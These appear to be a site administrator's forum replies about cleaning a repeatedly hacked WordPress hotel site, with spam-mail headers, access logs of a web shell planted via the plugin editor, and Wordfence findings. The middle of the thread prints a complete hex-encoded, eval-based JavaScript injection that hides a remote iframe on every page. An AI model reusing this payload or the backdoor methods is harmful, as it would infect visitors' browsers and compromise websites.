sibianul
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Fixing hacked wordpressThe favicon was also deleted by maldet, I remember it was in icon file, I wasn’t curious to get the file out of quarantine to check if it really had malicious code.
The idea with wp-admin came while reading another blog with suggestions regarding securing wordpress, that one was one of the suggestions, and also protecting the directory with an extra HTTP Auth password, but if you say it’s normal to have requests in the homepage, from wp-admin folder .. than this can’t be done
Forum: Fixing WordPress
In reply to: Fixing hacked wordpressThank you for the links, what about requests from homepage, to files inside wp-admin ? Is that normal for a plugin to requests files inside the admin folder ?
How to safely rename the wp-admin folder and still have the website working, without having any links to the new admin folder ?
The thing is that on this server I have around 300 website, almost all build by me .. and everytime something like this happens , it happens to clients that installed wordpress .. joomla website, and left them unupdated. One of my websites, about Sibiu City had it’s last redesign back in 2007 .. yet no viruses are altering my files or send huge amount of emalis. The same on all other websites, it happen like 5 times in the last 10 years, and each time it happen to a wordpress/joomla website 🙁
In wp-include there is a file class-phpmailer.php , isn’t this a wordpress file ?
Ohhh .. if anybody knew how much I hate wordpress platform … this website started again to send emails, I just deleted 5000 from the server queue as now the server doesn’t let the client to send any email, even if that legit.
At first look I can’t see any newly modified files but I will search all directories.
It’s weird I don;t see the actual sending file in the email headers, it just shows the domain name, maybe it send somehow from the index.php file
027T To: marinegmayer@gmail.com 042 Subject: Do you hear me calling, sweetie? 047 X-PHP-Script: hotelxxxxsibiu.ro/ for 127.0.0.1 037 Date: Tue, 8 Mar 2016 13:03:11 +0200 064F From: Gwendolyn Franklin <gwendolyn_franklin@hotelxxxxsibiu.ro> 065I Message-ID: <311561b093ab13f3a7b09f4aa3672fe8@hotelxxxxxsibiu.ro> 014 X-Priority: 3 068 X-Mailer: PHPMailer 5.2.9 (https://github.com/PHPMailer/PHPMailer/)Back in 16 february 2016 all the js files in wordpress ware modified, I though the modified date was 16 because I did the WordPress update …
Now I downloaded all the files again through FTP and while downloading AVG Freee antivirus was showing up a continous updating list with infected files, all of them ware js files.
Now I also cleaned all js .. I’ll see if there are even more issues, but still I don’t know how could it login with admin and wpupdatestream username …
/*e9fe1c0a92286e523b7d9e59446f2c66*/;(function(){var hdirieys="";var tfsikfzk="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822316164393737313135663330333031323962396635643065356331306432353022293b69662820783333647120213d2022653535393866346235333138393961383937333464386463623836323866376322297b783232627128223161643937373131356633303330313239623966356430653563313064323530222c226535353938663462353331383939613839373334643864636238363238663763222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f6e6577732e636865726e756968616d656c656f6e2e696e666f2f68656c6c6f6d796c6974746c6570696767792f3f78556a687750787675465a53793d7461514f53694555264a424d677a7473746941495a4c7372703d4b5756515768476c564e6c264d567071564474586a694a754a71586a713d74515541594f64267a6e5a667875654e753d7665586d5845596c696b6a2669717566454c646e443d6c597576456d64766446786f416877266b6579776f72643d6165303636643061393963623034636434613163623139356430653338363564266d5a70415341614d54453d5341544553524570494f50696e6626454c675371474d3d47724c6d63636169796f6a576a4e512642766455507579776966706a4a3d577670776776707148266c6a784f46556e437a4b3d6a437850794a6854626666223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (var ynrhzsfd=0;ynrhzsfd<tfsikfzk.length;ynrhzsfd+=2){hdirieys=hdirieys+parseInt(tfsikfzk.substring(ynrhzsfd,ynrhzsfd+2), 16)+",";}hdirieys=hdirieys.substring(0,hdirieys.length-1);eval(eval('String.fromCharCode('+hdirieys+')'));})();/*e9fe1c0a92286e523b7d9e59446f2c66*/Happen again, it was weird when I got an email that user admin logged in successfully to wp-admin, using an IP from Ukraine, after login he modified some files as you see bellow, I have changed the password of admin user, that user was used for the guys that made the website and also cleaned the modified files. This happen now 3 days ago.
Yesterday, I got another email
A user with username "wpupdatestream" who has administrator access signed in to your WordPress site. User IP: 176.104.52.19 User hostname: s-176-104-52-19.under.net.ua User location: Kiev, UkraineI blocked the IP in server firewall but I wonder how could he login with that username, from the same IP he logged in now a few days ago using admin username, I know it’s easy for him to hack again using a different IP. I will change the password of that username too …
Line 202763: 176.104.52.19 - - [22/Feb/2016:21:42:18 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 200 29 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14" Line 202764: 176.104.52.19 - - [22/Feb/2016:21:42:19 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 200 883 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14" Line 202765: 176.104.52.19 - - [22/Feb/2016:21:42:19 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 200 883 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14" Line 208375: 176.104.52.19 - - [24/Feb/2016:08:29:46 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 404 20980 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14" Line 214139: 176.104.52.19 - - [25/Feb/2016:05:17:36 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 404 20980 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14" Line 224173: 176.104.52.19 - - [26/Feb/2016:14:13:43 +0200] "POST /wp-admin/edit-form-tags.php HTTP/1.1" 200 - "htpp://www.hotelparcsibiu.ro/wp-admin/admin-ajax.php" "-" Line 224174: 176.104.52.19 - - [26/Feb/2016:14:13:44 +0200] "POST /wp-admin/wp-temp.php HTTP/1.1" 200 8 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14" Line 224300: 176.104.52.19 - - [26/Feb/2016:15:20:43 +0200] "GET / HTTP/1.1" 302 - "http://hotelparcsibiu.ro/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14" Line 224301: 176.104.52.19 - - [26/Feb/2016:15:20:44 +0200] "GET /ro/ HTTP/1.1" 200 24356 "http://hotelparcsibiu.ro/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14" Line 224302: 176.104.52.19 - - [26/Feb/2016:15:20:45 +0200] "POST /wp-login.php HTTP/1.1" 200 4168 "-" "-" Line 224303: 176.104.52.19 - - [26/Feb/2016:15:20:47 +0200] "GET /wp-admin/plugin-editor.php HTTP/1.1" 200 40954 "-" "-" Line 224304: 176.104.52.19 - - [26/Feb/2016:15:20:47 +0200] "POST /wp-admin/plugin-editor.php HTTP/1.1" 200 44953 "http://www.hotelparcsibiu.ro/wp-admin/plugin-editor.php" "-" Line 224305: 176.104.52.19 - - [26/Feb/2016:15:20:49 +0200] "POST /wp-admin/plugin-editor.php HTTP/1.1" 302 - "http://www.hotelparcsibiu.ro/wp-admin/plugin-editor.php" "-" Line 224306: 176.104.52.19 - - [26/Feb/2016:15:20:50 +0200] "GET /wp-admin/plugin-editor.php?file=contact-form-7%2Fwp-contact-form-7.php&liveupdate=1&scrollto=0&networkwide&_wpnonce=726434a350 HTTP/1.1" 302 - "http://www.hotelparcsibiu.ro/wp-admin/plugin-editor.php" "-" Line 224307: 176.104.52.19 - - [26/Feb/2016:15:20:50 +0200] "GET /wp-admin/plugin-editor.php?file=contact-form-7/wp-contact-form-7.php&a=te&scrollto=0 HTTP/1.1" 200 46228 "http://www.hotelparcsibiu.ro/wp-admin/plugin-editor.php" "-" Line 224308: 176.104.52.19 - - [26/Feb/2016:15:20:51 +0200] "GET /wp-content/plugins/contact-form-7/wp-contact-form-7.php?sam=ZWNobyAicGlwaXNrYSI7 HTTP/1.1" 200 7 "http://www.hotelparcsibiu.ro/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"So far it’s clean, in the beginning of the week when I cleaned the general-template.php file it took about 15 minutes to have it back infected, twice …
I believe those ware the file that cause the website to be reinfected over and over again, I should download the raw access log file and search for those file names to see if those ware really the case.
In one of the links you sent me about securing he wordpress there was a mention to add a password to wp-admin directory, I did that from cPanel but it didn’t worked anymore as it entered in a continuous loop, the user / pass popup didn’t shop up at all.
I wonder why this WP website get’s hacked that often, on this server I have ~200 websites, only this one is blocked in google.
Is there any internal cron job done in wordpress ? In cpanel there’s no cron job.
In the FTP log there’s only my IP address, the hacking is not done through FTP for sure.
I done a “all files” scan using wordfence and found a few suspect, now I’m checking them and delete :
[Feb 23 04:25:46] Done file contents scan
[Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-admin/js/media-upload28b7c.php
[Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-content/plugins/codestyling-localization/images/setup.php
[Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-content/plugins/wordfence/images/setup.php
[Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-includes/SimplePie/Content/Type/Sniffer263.php
[Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-includes/Text/Diff/Renderer/session68.php
[Feb 23 04:25:46] Adding issue: File contains suspected malware URL: /home/parcsb/public_html/wp-content/themes/hotelsibiu/style.css
[Feb 23 04:25:47] Starting scan of database
[Feb 23 04:25:47] Done database scan